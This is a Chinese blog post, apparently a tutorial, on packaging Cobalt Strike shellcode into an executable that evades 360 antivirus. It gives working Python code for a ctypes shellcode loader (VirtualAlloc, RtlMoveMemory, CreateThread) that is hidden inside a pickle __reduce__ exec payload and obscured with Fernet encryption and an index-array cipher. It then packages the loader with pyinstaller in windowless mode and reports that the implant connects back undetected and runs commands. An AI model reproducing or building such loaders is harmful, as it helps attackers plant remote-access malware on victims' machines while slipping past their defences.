本文章仅供参考学习

作者:mantou

博客地址:https://www.cnblogs.com/mantou0/

分离免杀

这个我就不多说了,效果确实不错,网上关于分离免杀的也有很多文章

不分离过360

一个exe,过360查杀,看一下我是怎么做的

首先用到的技术有:base64编码,exec函数,pickle模块,类特殊方法:__reduce__,Cryptography对称分组加密,Ctypes库,自己写的数组加密。

base64编码就不说了,应该都懂。

exec函数

exec函数是python的内置函数, 其功能与eval()函数相同, 但不同的是exec函数支持多行python代码的执行, 而eval()函数仅支持单行

  1. exec("""String = "HelloWorld"
  2. print(String)""") 
  4. #在上述的exec执行的python代码中定义了String变量,因此能进行输出
  5. print(String) 
  7. '''
  8. 代码执行结果:
  9. HelloWorld
  10. HelloWorld
  11. '''

pickle模块

pickle模块能实现任意对象与文本之间的相互转换, 也可实现任意对象和二进制之间的相互转换, 也就是说pickle能实现python对象的存储及恢复

python中几乎所有的数据类型(列表,字典,集合,类等等)都可以用pickle来序列化, 序列化的数据可读性差且难识别, 通常用于存储数据

pickle.dumps(obj)

dumps功能将数据转换成只有python语言认识的字符串

  • 参数obj: 要封装的对象
  1. import pickle
  2. data = ['henry','helloworld',123]
  3. p_str = pickle.dumps(data)
  4. print(p_str)
  5. #输出b'\x80\x04\x95\x1c\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x05henry\x94\x8c\nhelloworld\x94K{e.'

pickle.loads(bytes_obj)

loads功能将pickle数据转换成python的数据结构

  • 参数bytes_obj: pickle_dumps后的数据对象
  1. import pickle
  2. data = ['henry','helloworld',123]
  3. p_str = pickle.dumps(data)
  4. print(p_str)
  6. str = pickle.loads(p_str)
  7. print(str)
  8. #输出:['henry', 'helloworld', 123]

pickle.dump(obj,file,[protocol])

序列化对象, 并将结果数据流写入文件file中

  • 必填参数obj: 将要封装的对象
  • 必填参数file: 要写入的文件对象, file必须以二进制模式打开
  • 参数protocol: 代表序列化模式, 默认值为0, 表示以文本的形式进行序列化, protocol的值为1或2时表示以二进制的形式序列化
  1. import pickle
  2. data = ['henry','helloworld',123]
  4. with open('dump.txt','wb') as file:
  5.     pickle.dump(data,file)
  7. with open('dump.txt','rb') as file:
  8.     print(file.read()) #输出:b'\x80\x04\x95\x1c\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x05henry\x94\x8c\nhelloworld\x94K{e.'

pickle.load(file)

反序列化对象, 将文件中的数据解析为一个python对象

  • 必填参数file: 存有pickle数据的文件对象
  1. import pickle
  2. data = ['henry','helloworld',123]
  4. with open('dump.txt','wb') as file:
  5.     pickle.dump(data,file)
  7. with open('dump.txt','rb') as file:
  8.     print(pickle.load(file)) #输出:['henry', 'helloworld', 123]

类特殊方法:__reduce__

当定义扩展类型时(即使用python的C语言API实现的类型), 若你想pickle这些类型, 你必须告诉python如何去pickle

__reduce__方法在类中被定义后, 当对象被pickle时就会被调用, 它要么返回一个代表全局名称的字符串, python会查找此字符串并pickle; 要么返回一个元组, 此元组包含2到5个元素, 第一个元素为可调用的对象, 用于重建对象时调用; 第二个元素是参数元素(必须为元组), 供可调用对象(第一个元素)使用; 另外三个元素分别是: 被传递给__setstate__的状态(可选)、一个产生被pickle的列表元素的迭代器(可选)、一个产生被pickle的字典元素的迭代器(可选)

  1. import pickle
  2. shellcode = "list1 = [1,2,3,4]"
  4. class A(object):
  5.    def __reduce__(self):
  6.        return (exec,(shellcode,))
  8. #当实例对象被pickle后,则会调用特殊方法__reduce__,所以下列代码相当于pickle.dumps((exec,(shellcode,)))
  9. ret = pickle.dumps(A())
  11. print(ret)
  12. #输出:b'\x80\x04\x95-\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x04exec\x94\x93\x94\x8c\x11list1 = [1,2,3,4]\x94\x85\x94R\x94.'

Cryptography

简介

Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性

我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。因此需要高层次的抽象,把这些参数封装起来,让我们使用时,不用关心这么多参数,只要知道这么用足够安全就够了

对称加密又分为分组加密和序列加密,本文只讨论对称分组加密

  • 主流对称分组加密算法:DES、3DES、AES
  • 主流对称分组加密模式:ECB、CBC、CFB、OFB
  • 主流填充标准:PKCS7、ISO 10126、ANSI X.923、Zero padding

在cryptography库中,对称加密算法的抽象是fernet模块,包括了对数据的加解密以及签名验证功能,以及密钥过期机制,该模块采用了如下定义:

  • 加解密算法为AES,密钥位长128,CBC模式,填充标准PKCS7
  • 签名算法为SHA256的HMAC,密钥位长128位
  • 密钥可以设置过期时间

使用实例

  1. from cryptography.fernet import Fernet
  3. String = b"Hello World"
  5. #生成密钥
  6. key = Fernet.generate_key()
  7. print(key) #输出key: b'wmCNyvzUekp_JWEHUcTy4vS2qMrWDXbKOfTooYD1WiI='
  8. f_obj = Fernet(key) #定义一个用于实现加密和解密方法的对象
  10. #进行加密
  11. encrypt_String = f_obj.encrypt(String)
  12. print(encrypt_String) #输出加密后的内容: b'gAAAAABjetNK7sjOoosLI-KcPGdwvQQJVnhwYR9JIeGUx3hJ3qKOQXkaKiGgrlj8wr-tMZdhFKcoK75oONPP4rEDVna5cITQ9g=='
  14. #进行解密
  15. decrypt_String = f_obj.decrypt(encrypt_String)
  16. print(decrypt_String) #输出解密后的内容: b'Hello World'

Ctypes库

Ctypes 是 Python 的外部函数库。提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些库进行封装

而本编文章主要调用系统DLL的函数有VirtualAllocRtlMoveMemoryCreateThreadWaitForSingleObject, 这些函数后文都会讲述

数组加密

数组加密其实就是利用字符串将shellcode转换成数组的形式,然后利用字符串还原shellcode,字符串就相当于密钥,也可以说成将shellcode转换成字符串的索引数组,例如:

  1. list_char = "This is a configuration file please do not delete,configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967="
  2. list_index = "123123"
  3. #加密
  4. index_b = []
  5. for i in list_index:
  6.     index_a = list_char.index(i)
  7.     index_b.append(index_a)
  8. print("加密结果:",index_b)
  10. #解密
  11. index_c = ""
  12. for i in index_b:
  13.     index_c += list_char[i]
  14. print("解密结果:",index_c)
  15. 结果为:
  16. 加密结果: [101, 103, 100, 101, 103, 100]
  17. 解密结果: 123123

具体操作

第一步:我们获取Cobalt Strike将shellcode进行base64加密

代码是这样的,他会将base64代码保存到1.txt

  1. import base64
  2. import pickle
  3. shellcode =你生成的shellcodeb'xxxxxxx'形式)
  4. with open('1.txt','wb') as f:
  5.     f.write(base64.b64encode(shellcode))

第二步:加密数组生成:

  1. # pickle dump
  2. import pickle
  4. from cryptography.fernet import Fernet
  6. shellcode = """
  7. import ctypes
  8. import base64
  10. shellcode= base64.b64decode("此处放入base64编码后的shellcode")
  11. shellcode= bytearray(shellcode)
  12. ctypes.windll.kernel32.VirtualAlloc.restype= ctypes.c_uint64
  13. ptr= ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
  14. buf= (ctypes.c_char *len(shellcode)).from_buffer(shellcode)
  15. ctypes.windll.kernel32.RtlMoveMemory(
  16.    ctypes.c_uint64(ptr),
  17.    buf,
  18.    ctypes.c_int(len(shellcode))
  19. )
  20. handle= ctypes.windll.kernel32.CreateThread(
  21.    ctypes.c_int(0),
  22.    ctypes.c_int(0),
  23.    ctypes.c_uint64(ptr),
  24.    ctypes.c_int(0),
  25.    ctypes.c_int(0),
  26.    ctypes.pointer(ctypes.c_int(0))
  27. )
  28. ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
  29. """
  31. #cryptography 加密
  32. def EncryptTXT(ret):
  33.     key = Fernet.generate_key()
  34.     f = Fernet(key)
  35.     enc_pay = f.encrypt(bytes(bytearray(ret)))
  36.     return key, enc_pay.decode()
  38. def arraydecode(rr):
  39.     list_char = "This is a configuration file please do not delete,configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967="
  40.     # 数组加密
  41.     index_b = []
  42.     for i in rr:
  43.         index_a = list_char.index(str(i))
  44.         index_b.append(index_a)
  45.     return index_b
  47. #魔法函数
  48. class A(object):
  49.     def __reduce__(self):
  50.         return (exec, (shellcode,))
  52. ret = pickle.dumps(A())
  53. key,miwen = EncryptTXT(ret)
  54. arraykey = arraydecode(str(key))
  55. arrayindex = arraydecode(miwen)
  56. print(key)#输出密钥
  57. print(arrayindex)#输出加密后形成的的数组
  59. 结果是这样的:
  60. b'HkbuHfk3N_01YNu46wIHTNIQr1ZvDA8bp-LW5gwIppY='
  61. [15, 70, 70, 70, 70, 70, 71, 69, 29, 84, 10, 79,xxxxxxxxxxxxxxxxxxx]

第三步:python免杀马生成

填入第二步生成的数组,就是一个python马了

  1. import pickle
  2. from cryptography.fernet import Fernet
  3. import ctypes
  5. list_char =  "This is a configuration file please do not delete,configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967="
  7. def jiemi(index_b):
  8.     index_c = ""
  9.     for i in index_b:
  10.         index_c += list_char[i]
  11.     return index_c
  12. arrayindex = 此处填入第二步生成的加密数组(类型为:[x,x,x,x,x,x......])
  14. temp = jiemi(arrayindex)
  15. temp = bytes(temp, encoding = "utf8")
  16. key = b'lVRwv6R_rjbzbuk-1orl3pZRoATDcBmSZRbY58-PHhg='
  17. f_obj = Fernet(key)
  18. temp = f_obj.decrypt(temp)
  19. shellcode=pickle.loads(temp)

第四步:打包

将第三步的代码打包成exe,使用pyinstaller的打包方式就可以,exe会生成在dist文件夹

  1. pyinstaller -F -w 4.py	这样打包就可以
  2. pyinstaller -F -w -i 2.ico 4.py	带图标打包,图标要和程序放在同一个目录

实战效果

360木马查杀扫不出来

再试一下能不能上线,双击之后360没有任何提示,成功上线

执行命令,也是能执行成功

文章参考:https://www.cnblogs.com/henry666/p/16910624.html

Python免杀过360的更多相关文章

  1. Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

    Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...

  2. [原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)

    0x001 原理 采用分离法,即将ShellCode和加载器分离.方法较LOW但免杀. 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode. PS: 何为SC加载器,即专门用于 ...

  3. Metasploit+python生成免杀exe过360杀毒

    Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reve ...

  4. 《Python绝技:运用Python成为顶级黑客》 用Python实现免杀

    1.免杀的过程: 使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者 ...

  5. Python 加密 shellcode 免杀

    Python 加密 shellcode 免杀 环境准备:   Windows7 32 位系统: Shellcode 使用 kali linux Metasploit 生成 shellcode Wind ...

  6. 使用Python进行防病毒免杀

    很多渗透工具都提供了权限维持的能力,如Metasploit.Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为.在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这 ...

  7. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

  8. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  9. 20165230 Exp3 免杀原理与实践

    目录 1.实验内容 2.基础问题回答 3.实验内容 任务一:正确使用免杀工具或技巧 使用msf编码器,msfvenom生成如jar之类的其他文件 使用veil-evasion 自己利用shellcod ...

  10. 2018-2019-2 网络对抗技术 20165335 Exp3 免杀原理与实践

    一.免杀原理与基础知识: (1)杀软是如何检测出恶意代码的? 检测特征码:特征码就是一般程序都不会有的代码,而后门有的那种特别的数据,而一个程序,应用有这种代码,数据的话,就直接判定为恶意代码. 主流 ...

随机推荐

  1. Monaco Editor 中的 Keybinding 机制

    一.前言 前段时间碰到了一个 Keybinding 相关的问题,于是探究了一番,首先大家可能会有两个问题:Monaco Editor 是啥?Keybinding 又是啥? Monaco Editor: ...

  2. Tubian系统无法打开Android子系统的解决方法

    打开Konsole,Konsole在程序菜单(左下角Logo)-系统中 输入: sudo nano /var/lib/waydroid/waydroid.cfg 回车 按方向键,把光标移动到[prop ...

  3. PHP全栈开发(四): HTML 学习(3. form 表单)

    form 表单标签 它表的是一个区域,而非是一个具体的某个元素,它也是作为一个容器的存在. 表单域主要是允许用户在表单域中输入内容,比如文本框,下拉列表,单选框,复选框,等等. <!DOCTYP ...

  4. GCN的原理及其代码实现

    图数据的特征性质 图像数据是一种特殊的图数据,图像数据是标准的2D网格结构图数据.图像数据的CNN卷积神经网络算法不能直接用在图数据上,原因是图数据具有以下特殊性. 节点分布不均匀:图像数据及网格数据 ...

  5. 【博学谷学习记录】超强总结,用心分享|MySql连接查询超详细总结

    一.概述 在实际开发中,大部分情况下都不是在单表中进行数据操作,一般都是多张表进行联合查询.通常一个业务就会对应的有好几张表.MySql中的连接查询分为交叉连接,内连接,外连接三部分.其中交叉连接也叫 ...

  6. 微软出品自动化神器【Playwright+Java】系列(五) 之 常见点击事件操作

    写在前面 明天就是周五了,这周有那么一两天心情特别不好,真的是做什么都没兴致,所以导致整个人都很丧,什么都不想做. 本打算周一就更新这篇文章的,但由于公司一直加班,每天到家很晚,都是挤时间去学,理解后 ...

  7. JSP页面实现验证码校验

    目录 验证码校验分析 生成验证码 测试验证码 校验验证码 测试验证码校验 添加验证码刷新 在网页页面的使用中为防止"非人类"的大量操作和防止一些的信息冗余,增加验证码校验是许多网站 ...

  8. 基于 Redis 生成分布式订单号

    环境依赖: //spingBoot <version>2.6.6</version> //jdk11 <dependency> <groupId>org ...

  9. 关于引用JS和CSS文件刷新浏览器缓存问题,部署服务器后客户端样式不刷新

    问题描述 对样式的css文件进行了修改,部署到服务器后访问发现页面展示不正常,但是刷新之后就会展示正常. 问题分析 研究之后发现可能的原因有 css文件过大,加载缓慢 本地缓存问题,虽然服务器修改了c ...

  10. Blog1:nchu-software-oop-2022-1~3

    (1) 前言 针对在完成三次作业过程中产生的问题进行总结与分析. 三次作业一共十五(9+3+3)道题目,其中前两次难度较为简单,第三次复杂程度飞跃式上涨. 其中,涉及到java语言中基本的输入输出语句 ...